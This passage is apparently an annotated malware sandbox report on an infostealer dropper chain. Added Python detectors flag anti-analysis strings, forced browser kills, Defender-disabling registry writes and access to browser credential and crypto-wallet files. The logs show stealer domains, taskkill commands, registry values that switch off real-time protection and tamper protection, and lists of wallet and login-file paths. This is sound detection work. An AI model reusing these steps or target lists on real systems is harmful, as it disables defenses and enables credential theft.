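    return (("ascii", re.compile(narrow, flags)), ("utf16le", re.compile(wide, flags)))


def scan_dump(buf):
    """Return {technique: [(indicator, encoding, offset), ...]} for every hit."""
    hits = defaultdict(list)
    for technique, (names, ci, terminated) in INDICATORS.items():
        for name in names:
            for encoding, pat in _patterns(name, ci, terminated):
                for m in pat.finditer(buf):
                    hits[technique].append((name, encoding, m.start()))
    return {k: sorted(v, key=lambda h: h[2]) for k, v in hits.items()}


def techniques_present(buf):
    return sorted(scan_dump(buf))


def _wide(s):
    return s.encode("utf-16-le") + b"\x00\x00"


# Constructed dump: NUL padding, then strings in both encodings; "Justice" and
# the Winsock catalog entry are decoys that must not match.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"OLLYDBG\x00"
    + _wide("procmon_window_class")
    + b"\\\\.\\SICE\x00"
    + b"Justice\x00"
    + b"HARDWARE\\ACPI\\DSDT\\VBOX__\x00"
    + b"VMwareVMware{"
    + b"Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\\system32\\mswsock.dll\x00"
    + _wide("Oreans.vxd")
    + b"Software\\WinLicense\x00"
)

if __name__ == "__main__":
    for technique, found in scan_dump(SAMPLE_DUMP).items():
        print(technique, found)
```

Run it over a real dump (for instance the .sdmp regions the report cites) by passing the file bytes to scan_dump; the offsets let you pivot straight to the surrounding code in a disassembler.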

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 5712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 6444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6456, type: MEMORYSTR
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.2128348066.0000000004800000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe "C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe "C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe "C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003039001\num.exe "C:\Users\user\AppData\Local\Temp\1003039001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: deecb7b612.exe, 0000000D.00000002.2855360804.0000000000592000.00000002.00000001.01000000.00000010.sdmp, deecb7b612.exe, 00000022.00000000.2920534582.0000000000592000.00000002.00000001.01000000.00000010.sdmp, random[1].exe1.5.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: b76bb5cee7.exe, 0000000A.00000002.2766477851.0000000000F11000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: &CProgram Manager
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe, 99Q4Y3O9GBOXYTDVM9GPHI.exe, 00000004.00000002.2462253080.0000000000723000.00000040.00000001.01000000.00000009.sdmp, skotes.exe, 0000000B.00000002.2785411253.0000000000E73000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: RProgram Manager
Source: YQEN9A9QU4P1VROBPV5YS.exe, YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000002.2487806714.000000000075C000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: \Program Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003039001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1003039001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
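The process-creation records above show deecb7b612.exe (both instances, PIDs 5856 and 6976) launching taskkill /F /IM <browser> /T for Firefox, Chrome, Edge, Opera and Brave in quick succession, which is the behaviour behind the report's "Credential Flusher" detection. Whatever the follow-on step, a burst of forced browser kills issued by a binary under the user's Temp directory is rare in legitimate use and cheap to detect from process-creation telemetry. The detection logic below is an added example written for this page, not code from the report or from any of the malware families it names; the event records and the cmd.exe control event are constructed to mirror the lines above, and the three-browsers-in-sixty-seconds threshold is an assumed tuning value.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Browser images the report shows being force-killed.
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
TASKKILL_IM_RE = re.compile(r"/IM\s+(\S+)", re.IGNORECASE)
USER_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessCreate:
    """One process-creation record (Sysmon EID 1 / 4688 style); constructed for this example."""
    ts: float            # seconds on any monotonic clock
    parent_image: str    # full path of the creating process
    image: str           # full path of the created process
    command_line: str


def killed_browser(ev):
    """Browser image named by 'taskkill ... /IM <name>', or None if this is not a browser kill."""
    if not ev.image.lower().endswith("\\taskkill.exe"):
        return None
    m = TASKKILL_IM_RE.search(ev.command_line)
    if m is None:
        return None
    name = m.group(1).lower()
    return name if name in BROWSERS else None


def detect_browser_kill_burst(events, min_browsers=3, window_s=60.0):
    """One finding per parent that kills >= min_browsers distinct browsers within window_s seconds."""
    kills = defaultdict(list)
    for ev in events:
        name = killed_browser(ev)
        if name:
            kills[ev.parent_image].append((ev.ts, name))
    findings = []
    for parent, hits in kills.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            in_window = {name for t, name in hits[i:] if t - t0 <= window_s}
            if len(in_window) >= min_browsers:
                findings.append({
                    "parent": parent,
                    "browsers": sorted(in_window),
                    # every dropped stage in this report lives under %LOCALAPPDATA%\Temp
                    "parent_in_user_temp": bool(USER_TEMP_RE.search(parent)),
                    "first_kill_ts": t0,
                })
                break  # one finding per parent is enough
    return findings


# Constructed records mirroring the report's taskkill lines, plus one benign control.
DROPPER = r"C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe"
TASKKILL = r"C:\Windows\SysWOW64\taskkill.exe"
SAMPLE_EVENTS = [
    ProcessCreate(10.0 + i, DROPPER, TASKKILL, f"taskkill /F /IM {b} /T")
    for i, b in enumerate(["firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"])
] + [
    # a helpdesk batch file killing a single hung browser: must not alert
    ProcessCreate(500.0, r"C:\Windows\System32\cmd.exe", TASKKILL, "taskkill /F /IM chrome.exe"),
]


def run_sample():
    return detect_browser_kill_burst(SAMPLE_EVENTS)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The sliding window is keyed on the parent image rather than on PID, so the two deecb7b612.exe instances in the report would collapse into one finding; key on (parent PID, parent image) instead if per-instance alerts are wanted.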

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: file.exe, 00000000.00000003.2221874778.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221899920.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2713118781.00000000056EF000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2713360207.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2724741718.00000000056E4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2937290461.0000000001A75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
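The registry writes in this section switch off Defender real-time monitoring and IOAV scanning under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender, hide Security Center notifications, record TamperProtection 0 (the report omits that value's key path), and touch the Windows Update policy key. The Policies hive is normally populated by Group Policy processing, so a binary under %TEMP% writing to it is suspicious regardless of the data written, and the values with data shown are unambiguous. The audit below is an added example written for this page, not tooling from the report's vendor: it parses registry lines of the four shapes that appear above, rates each write, and distinguishes "protection switched off" from "policy hive written by something that is not Group Policy". The sample lines are copied from the section; the allowlist of legitimate policy writers (svchost.exe hosting gpsvc, gpupdate.exe) and the svchost.exe control line are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class RegWrite:
    process: Optional[str]   # None when the report line names only the key
    key: Optional[str]       # None when the report line omits the key path
    name: str
    value: Optional[int]     # None when the report line omits the data


# The four line shapes in the report's registry section. "Jump to behavior" is the
# report's link label and is accepted but ignored.
_TAIL = r"(?: Jump to behavior)?$"
_LINE_SHAPES = [
    re.compile(r"^Source: (?P<proc>\S+) Registry key value created / modified: "
               r"(?P<key>HKEY_\S.*?) (?P<name>\S+) (?P<val>\d+)" + _TAIL),
    re.compile(r"^Source: (?P<key>HKEY_\S.*?) Registry value created: (?P<name>\S+) (?P<val>\d+)" + _TAIL),
    re.compile(r"^Source: (?P<proc>\S+) Registry value created: (?P<name>\S+) (?P<val>\d+)" + _TAIL),
    re.compile(r"^Source: (?P<proc>\S+) Key value created or modified: (?P<key>HKEY_\S.*?) (?P<name>\S+)" + _TAIL),
]


def parse_line(line):
    """Turn one report line into a RegWrite, or None if it is not a registry-write line."""
    for rx in _LINE_SHAPES:
        m = rx.match(line.strip())
        if m:
            g = m.groupdict()
            val = g.get("val")
            return RegWrite(g.get("proc"), g.get("key"), g["name"], int(val) if val is not None else None)
    return None


# Value data that means a protection is switched off, with the severity it deserves.
# Keyed by value name only because the report prints TamperProtection without its key.
DISABLING_VALUES = {
    "DisableRealtimeMonitoring": (1, "high"),
    "DisableIOAVProtection": (1, "high"),
    "TamperProtection": (0, "high"),
    "DisableNotifications": (1, "medium"),
    "DoNotConnectToWindowsUpdateInternetLocations": (1, "medium"),
}
POLICY_PREFIXES = (
    r"hkey_local_machine\software\policies\microsoft\windows defender",
    r"hkey_local_machine\software\policies\microsoft\windows\windowsupdate",
)
# Assumption: Group Policy processing (gpsvc inside svchost.exe, gpupdate.exe) is the
# only expected writer of these policy keys on a managed host.
LEGITIMATE_POLICY_WRITERS = ("\\svchost.exe", "\\gpupdate.exe")


def assess(w):
    """Return (severity, reason) for one write; severity is 'high', 'medium' or 'info'."""
    rule = DISABLING_VALUES.get(w.name)
    if rule and w.value == rule[0]:
        return rule[1], f"{w.name}={w.value} switches a protection off"
    if w.key and w.key.lower().startswith(POLICY_PREFIXES):
        proc = (w.process or "").lower()
        if not proc.endswith(LEGITIMATE_POLICY_WRITERS):
            writer = w.process or "an unrecorded process"
            return "medium", f"{w.name} written under the Policies hive by {writer}"
    return "info", "no rule matched"


def audit(lines):
    """[(severity, value name, reason)] for every registry-write line found, in input order."""
    out = []
    for line in lines:
        w = parse_line(line)
        if w is not None:
            sev, why = assess(w)
            out.append((sev, w.name, why))
    return out


# Lines copied from the report, one benign control, and one non-registry line.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior",
    r"Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1",
    r"Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1",
    r"Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Registry value created: TamperProtection 0",
    r"Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions",
    r"Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations",
    # constructed control: the same policy value written by Group Policy processing
    r"Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions",
    "Source: file.exe String found in binary or memory: keystore",
]


def run_sample():
    return audit(SAMPLE_LINES)


if __name__ == "__main__":
    for sev, name, why in run_sample():
        print(f"{sev:6s} {name}: {why}")
```

Lines that carry only a value name and no data (the two WindowsUpdate\AU entries) still rate as medium through the policy-hive rule, which is the point of keeping that rule separate from the value table.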

Stealing of Sensitive Information

Source: Yara match File source: 32.2.KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.99Q4Y3O9GBOXYTDVM9GPHI.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.skotes.exe.c70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.2947624968.00000000004D1000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2372324110.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.2905323869.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2461719717.0000000000521000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2743978595.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2785010613.0000000000C71000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2475357445.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.2989652207.000000000114F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: deecb7b612.exe PID: 5856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: deecb7b612.exe PID: 6976, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 6532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 4916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: efe6fe4127.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 31.2.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.2.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 48.0.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.b76bb5cee7.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.num.exe.2a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.b76bb5cee7.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2721535335.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3018675741.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2767324044.000000000135E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2877033985.000000000081E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2766160676.0000000000AA1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3018412209.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.3003208783.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.3028252435.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2961232929.0000000000AA1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2875184699.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2862123172.0000000005220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2967959553.000000000150B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2875355609.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.2854773209.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.2855075944.00000000002BE000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.3003112537.00000000002A1000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 5712, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b76bb5cee7.exe PID: 6444, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6456, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1003039001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: efe6fe4127.exe, 00000009.00000003.2697127917.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: efe6fe4127.exe, 00000009.00000003.2697127917.0000000000B6F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
Source: file.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: efe6fe4127.exe, 0000000C.00000003.2836024588.0000000001A56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: file.exe, 00000000.00000003.2221768283.0000000000A69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe String found in binary or memory: ExodusWeb3
Source: efe6fe4127.exe, 0000000C.00000003.2836024588.0000000001A56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000000.00000003.2209806548.0000000000A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
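The strings above name desktop wallet locations (Electrum-LTC, ElectronCash, Exodus, Coinomi, Jaxx, the Ethereum keystore), and the file-open records that follow show efe6fe4127.exe reading Chrome, Edge and Firefox profile files (Login Data, Login Data For Account, Web Data, History, Network\Cookies, logins.json, cert9.db, cookies.sqlite, places.sqlite, formhistory.sqlite) together with dozens of Local Extension Settings\<id> and Sync Extension Settings\<id> directories, which is where Chromium keeps per-extension storage, browser wallets included. The classifier below is an added example written for this page, not code from the report: it maps file-access events to the category of secret they expose and reports every non-browser process that touched one. The wallet names attached to a few extension IDs from the report are the editor's mapping from the Chrome Web Store and should be verified before use; the efe6fe4127.exe events are constructed from the records in this section, and the chrome.exe and notepad.exe control events are constructed.

```python
import re
from collections import Counter
from dataclasses import dataclass
from ntpath import basename   # splits Windows paths correctly on any host

BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}

# Chromium profile files (lower-cased basename) and what they hold.
CHROMIUM_FILES = {
    "login data": "chromium_logins",
    "login data for account": "chromium_logins",
    "web data": "chromium_autofill",
    "history": "chromium_history",
    "cookies": "chromium_cookies",
}
FIREFOX_FILES = {
    "logins.json": "firefox_logins",
    "key4.db": "firefox_logins",        # needed to decrypt logins.json
    "cert9.db": "firefox_nss_db",
    "cookies.sqlite": "firefox_cookies",
    "places.sqlite": "firefox_history",
    "formhistory.sqlite": "firefox_formhistory",
    "prefs.js": "firefox_prefs",
}
# Chromium extension storage directories; extension IDs are 32 letters in a-p.
EXTENSION_RE = re.compile(r"\\(?:Local|Sync) Extension Settings\\([a-p]{32})(?:\\|$)", re.IGNORECASE)
# Assumption: editor's mapping of some IDs seen in the report to wallet extensions; verify first.
WALLET_EXTENSIONS = {
    "nkbihfbeogaeaoehlefnkodbefgpgknn": "MetaMask",
    "hnfanknocfeofbddgcijnmhnfnkdnaad": "Coinbase Wallet",
    "bfnaelmomeimhlpmgjnjophhpkkoljpa": "Phantom",
    "ibnejdfjmmkpcnlpebklmnkoeoihofec": "TronLink",
    "egjidjbpglichdcondbcbdnbeeppgdph": "Trust Wallet",
}
# Desktop wallet locations taken from the report's strings (geth keeps keys in Ethereum\keystore).
WALLET_APP_DIRS = [re.compile(p, re.IGNORECASE) for p in (
    r"\\Electrum-LTC\\wallets", r"\\ElectronCash\\wallets", r"\\Exodus\\exodus\.wallet",
    r"\\Coinomi\\Coinomi\\wallets", r"\\com\.liberty\.jaxx\\", r"\\Ethereum\\keystore",
)]


def classify(path):
    """Category of secret the path exposes, or None for an uninteresting path."""
    p = path.replace("/", "\\")
    low = p.lower()
    m = EXTENSION_RE.search(p)
    if m:
        return "wallet_extension" if m.group(1).lower() in WALLET_EXTENSIONS else "extension_storage"
    name = basename(low)
    if "\\mozilla\\firefox\\profiles\\" in low and name in FIREFOX_FILES:
        return FIREFOX_FILES[name]
    if "\\user data\\" in low and name in CHROMIUM_FILES:
        return CHROMIUM_FILES[name]
    if any(rx.search(p) for rx in WALLET_APP_DIRS):
        return "wallet_app"
    return None


@dataclass(frozen=True)
class FileOpen:
    process: str   # image path of the opening process
    path: str


def triage(events):
    """Per non-browser process: how many files of each category it opened and which wallets it hit."""
    report = {}
    for ev in events:
        category = classify(ev.path)
        if category is None:
            continue
        if basename(ev.process).lower() in BROWSER_IMAGES:
            continue   # a browser reading its own profile is normal
        entry = report.setdefault(ev.process, {"categories": Counter(), "wallets": set()})
        entry["categories"][category] += 1
        m = EXTENSION_RE.search(ev.path.replace("/", "\\"))
        if m and m.group(1).lower() in WALLET_EXTENSIONS:
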